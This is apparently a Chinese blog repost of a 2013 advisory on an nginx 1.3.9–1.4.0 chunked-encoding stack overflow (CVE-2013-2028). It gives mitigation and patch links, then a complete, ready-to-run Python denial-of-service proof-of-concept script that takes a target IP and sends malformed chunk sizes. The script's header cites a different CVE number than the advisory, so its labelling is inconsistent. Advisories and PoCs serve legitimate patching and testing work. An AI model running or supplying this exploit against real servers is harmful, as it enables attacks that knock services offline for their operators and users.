nginx 'ngx_http_parse.c'栈缓冲区溢出漏洞

最新推荐文章于 2023-07-05 21:58:32 发布
最新推荐文章于 2023-07-05 21:58:32 发布
阅读量299 收藏
点赞数
文章标签: 运维 python 操作系统
原文链接:http://www.cnblogs.com/security4399/archive/2013/05/17/3084176.html
版权
漏洞版本:
Nginx 1.3.9 - 1.4.0
漏洞描述:
BUGTRAQ  ID: 59699
CVE(CAN) ID: CVE-2013-2028

nginx是HTTP及反向代理服务器,同时也用作邮件代理服务器。

nginx 1.3.9 - 1.4.0在解析HTTP块时,"ngx_http_parse_chunked()"函数 (http/ngx_http_parse.c)中存在错误,可被利用造成栈缓冲区溢出。
<* 参考
http://secunia.com/advisories/53248/
http://www.openwall.com/lists/oss-security/2013/05/07/3
http://nginx.org/en/security_advisories.html
*>
安全建议:
临时解决方法:

建议您升级到nginx 1.4.1或者是1.5.0。但如果您不能立刻安装补丁或者升级,您可以采取以下措施以降低威胁:

* 在每个server{}块中使用如下配置

if ($http_transfer_encoding ~* chunked) {
       return 444;
   }

厂商补丁:

Nginx
-----
Nginx已经为此发布了一个安全公告(security_advisories)以及相应补丁:
security_advisories:nginx security advisories
链接:http://nginx.org/en/security_advisories.html

补丁下载:http://nginx.org/download/patch.2013.chunked.txt




POC:

# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)
# Google Dork: CVE-2013-2070
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & nginx v1.4.0
# CVE : CVE-2013-2070
 
import httplib
import time
import socket
import sys
import os
 
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
 
packet = 0
 
def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked
 
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
        os.system("clear")
elif sys.platform == 'win32':
        os.system("cls")
else:
        os.system("cls")
                 
print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]"
print "======================================================================"
 
if len(sys.argv) < 2:
        print "Usage: python nginx_dos.py [target ip]\n"
        print "Example: python nginx_dos.py 127.0.0.1\n"
        sys.exit(1)
else:
    host = sys.argv[1].lower()
         
while packet <= 5:
 
    body = "Mert SARICA"
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
 
    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
 
    try:
        con = httplib.HTTPConnection(host)
        url = "/mertsarica.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', "curl/7.30.0")
        con.putheader('Accept', "*/*")
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', "application/x-www-form-urlencoded")
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)
         
    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        print "[*] Knock knock, is anybody there ? (" + str(packet) + "/5)"
 
    packet = packet + 1
     
    con.close()
 
print "[+] Done!"

  

转载于:https://www.cnblogs.com/security4399/archive/2013/05/17/3084176.html

weixin_30247159
关注
ngx_stream_module.so
12-22
nginx1.20.2
Linux利用源码包升级Nginx到1.23.1用以解决nginx安全漏洞问题
夜灬狼丶
07-21 5065
升级nginx到1.23.1用以解决以下下安全漏洞问题 NGINX 环境问题漏洞(CVE-2019-20372) NGINX 环境问题漏洞(CVE-2020-12440) NGINX 拒绝服务漏洞(CVE-2016-4450) NGINX RANGE FILTER模块数字错误漏洞(CVE-2017-7529)
Nginx错误配置导致的漏洞学习
willow_liang的博客
10-23 470
环境准备: 1.安装编译工具及库文件,安装PCRE,PCRE作用是让Nginx支持Rewrite功能。 yum -y install make zlib zlib-devel gcc c++ libtool openssl openssl-devel cd /usr/local/src wget http://downloads.sourceforge.net/project/pcre/pcre/8.35/pcre-8.35.tar.gz chmod -R 777 /usr tar -zxvf pcre-
nginx HTTP请求远程缓冲区溢出漏洞
weixin_33827965的博客
09-18 1241
漏洞起因边界条件错误影响系统Igor Sysoev nginx 0.8.14 Igor Sysoev nginx 0.7.61 Igor Sysoev nginx 0.6.38 Igor Sysoev nginx 0.5.37不受影响系统Igor Sysoev nginx 0.8.15 Igor Sysoev nginx 0.7.62 Igor Sysoev nginx ...
Nginx HTTP之请求行解析函数ngx_http_parse_request_line
幽雨雨幽
11-16 1741
NginxHTTP模块中使用ngx_http_parse_request_line函数来对读取的请求行进行解析,HTTP请求行的格式不是很复杂,但是要注意HTTP 0.9与1.0、1.1之间的区别;另外,作为Nginx的第一个版本,里面支持的请求方法也只有GET、POST和HEAD。 /* http/ngx_http_parse.c */   /* 解析HTTP请求行  * param r:...
CVE-2013-2028 经典溢出漏洞复现资料整理
^_^
10-25 2316
一个经典的由整数溢出导致溢出的漏洞。下面感觉写的有点乱。 文章目录复现漏洞相关基础知识CVE-2013-2028原理安装漏洞环境ubuntu 安装docker安装metasploit框架触发漏洞网站上现有的exp 复现漏洞 CVE-2013-2028:nginx 溢出漏洞 相关基础知识 的基础知识:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/stack-intro-zh/ 溢出原理:https://ctf-wik
ngx_http_proxy_connect_module.zip
06-17
ngx_http_proxy_connect_module是一个针对Nginx服务器的第三方模块,主要功能是支持HTTP代理的"CONNECT"方法。在默认情况下,Nginx仅处理HTTPHTTPS请求,但不支持通过HTTP代理进行TCP连接,比如SSL/TLS隧道。这个...
ngx_http_dav_ext_module.so
04-12
ngx_http_dav_ext_module.so centos7 nginx 1.18 可以作为模块加载
nginx-1.22.0-1.el7.ngx.x86_64_ngx_rtmp_ipv6.rpm
05-30
2022年5月30日 官方当前最新稳定版本nginx 二进制rpm包 适用于x86架构centos7 rhel7版本操作系统升级安装nginx 该包开启了ipv6支持,添加了nginx-rtmp模块支持
ngx_cache_purge_2.4.2.tar.gz
02-21
ngx_cache_purge_2.4.2.tar.gz 是一个针对Nginx缓存管理的模块扩展,主要用于清除或刷新Nginx服务器上的HTTP缓存。这个版本2.4.2的压缩包包含了ngx_cache_purge模块的所有源代码及相关文件,以便开发者在自己的Nginx...
srcache-nginx-module, 基于透明subrequest的任意 Nginx 位置缓存布局.zip
09-18
srcache-nginx-module, 基于透明subrequest的任意 Nginx 位置缓存布局 电子邮件名称ngx_srcache - 基于透明subrequest的任意 Nginx 位置缓存布局:这里 MODULE 没有与 Nginx 源一起分发。 我们将看到安装说明( 参见参考资料) 。 table-内容NAME状态
nginx-1.4.0:用于CVE-2013-2028的分析
05-14
nginx-1.4.0 用于的 漏洞利用:exp-nginx.rb 二进制文件(用于rop构建):nginx
Nginx溢出分析 - CVE-2013-2028
dengzhasong7076的博客
01-11 1095
分析 + 运行环境: ubuntu x64 + centos 环境搭建: https://github.com/kitctf/nginxpwn 影响版本: nginx 1.3.9 - 1.4.0 主要以此来学习BROP: 可以不需要知道该应用程序的源代码或者任何二进制代码进行攻击,类似SQL盲注。 基础铺垫 Nginx是一个轻量级的Web服务器,它还具有反向代理、电子邮件代理等功能,并且...
nginx 'ngx_http_parse.c' 缓冲区溢出漏洞
weixin_30608131的博客
05-15 200
漏洞名称: nginx 'ngx_http_parse.c' 缓冲区溢出漏洞 CNNVD编号: CNNVD-201305-143 发布时间: 2013-05-14 更新时间: 2013-05-14 危害等级: 漏洞类型: 缓冲区溢出 威胁类型: 远程 CVE编号: CV...
CVE-2023-21839 【vulhub weblogic 漏洞复现】
最新发布
weixin_65722679的博客
07-05 749
CVE-2023-21839 【vulhub weblogic 漏洞复现】
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 865
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
nginx的接受包体
Edidaughter的博客
12-11 616
http请求体
Nginx/OpenResty内存泄漏/目录穿越漏洞通告
爱国小白帽
03-19 7676
Nginx/OpenResty内存泄漏/目录穿越漏洞通告 原创 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞Nginx 是异步框架的网页服务...
Nginx服务安全漏洞修复
jane_xing的博客
08-10 4548
1、安全漏洞说明 使用Nginx提供服务的产品,经过安全扫描工具扫描后报出三个高风险、三个中风险安全漏洞 2、nginx版本过低自带安全漏洞 升级nginx版本到1.21.1后,三个高风险漏洞消失。 3、HTTP 信息头公开 下载源码: http://nginx.org/en/download.html 修改源码: 修改Server头需要修改的源码位置有三个: src/core目录下的nginx.h文件 src/http目录下的ngx_http_header_filter_modul
nginx代理增强模块:ngx_http_proxy_connect_module.zip
此模块是专为Nginx(一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP代理服务器)设计的扩展模块,名称为“ngx_http_proxy_connect_module”,其作用主要是实现一个备用的代理功能。 ### Nginx简介 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值